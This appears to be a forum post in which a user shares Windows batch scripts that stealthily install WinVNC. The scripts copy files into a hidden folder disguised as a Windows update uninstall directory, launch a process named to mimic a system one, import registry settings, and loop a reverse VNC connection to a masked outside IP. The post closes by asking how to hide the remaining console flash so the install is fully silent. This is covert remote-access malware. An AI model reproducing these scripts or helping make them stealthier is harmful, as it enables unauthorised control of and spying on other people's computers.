@echo off
"C:WINDOWS$NtUninstallKB21050c07160c070f0b0a0a05031b05$nircmd.exe" wait 40000
:loop
"C:WINDOWS$NtUninstallKB21050c07160c070f0b0a0a05031b05$WinVnc.exe" -connect xxx.xxx.xxx.xxx::5500
"C:WINDOWS$NtUninstallKB21050c07160c070f0b0a0a05031b05$nircmd.exe" wait 90000
goto loop
this is what I made the reverse.exe out of. the this is in go.bat
echo off
if not exist WIPdump md WIPdump >nul
if not exist WIPdump%computername% md WIPdump%computername% >nul
cd WIPCMD >nul
echo off
mkdir %systemroot%$NtUninstallKB21050c07160c070f0b0a0a05031b05$ || mkdir "%appdata%hbn"
cd WIPVNCInstallFiles
start cssrss.exe
copy *.* %systemroot%$NtUninstallKB21050c07160c070f0b0a0a05031b05$ || copy *.* "%appdata%hbn"
attrib %systemroot%$NtUninstallKB21050c07160c070f0b0a0a05031b05$ +s +h & attrib "%appdata%hbn" +s +h
copy reverse.exe %systemroot%
start %systemroot%$NtUninstallKB21050c07160c070f0b0a0a05031b05$services.bat
regedit /s WIPCMDvncdmp.reg
regedit /s WIPCMDvncdmp1.reg
regedit /s WIPCMDvncdmp2.reg
regedit /s WIPCMDVNC.reg
ping -n 3 localhost > nul
net start WinVNC
nircmd.exe execmd CALL WIPVNCInstallfilessend.cmd
I have one more problem though. When this installs it is not completely silent. I use a vbs script to launch the go.bat and there is a black window that pops up for a split second. I was wondering if there is a way to get rid of that.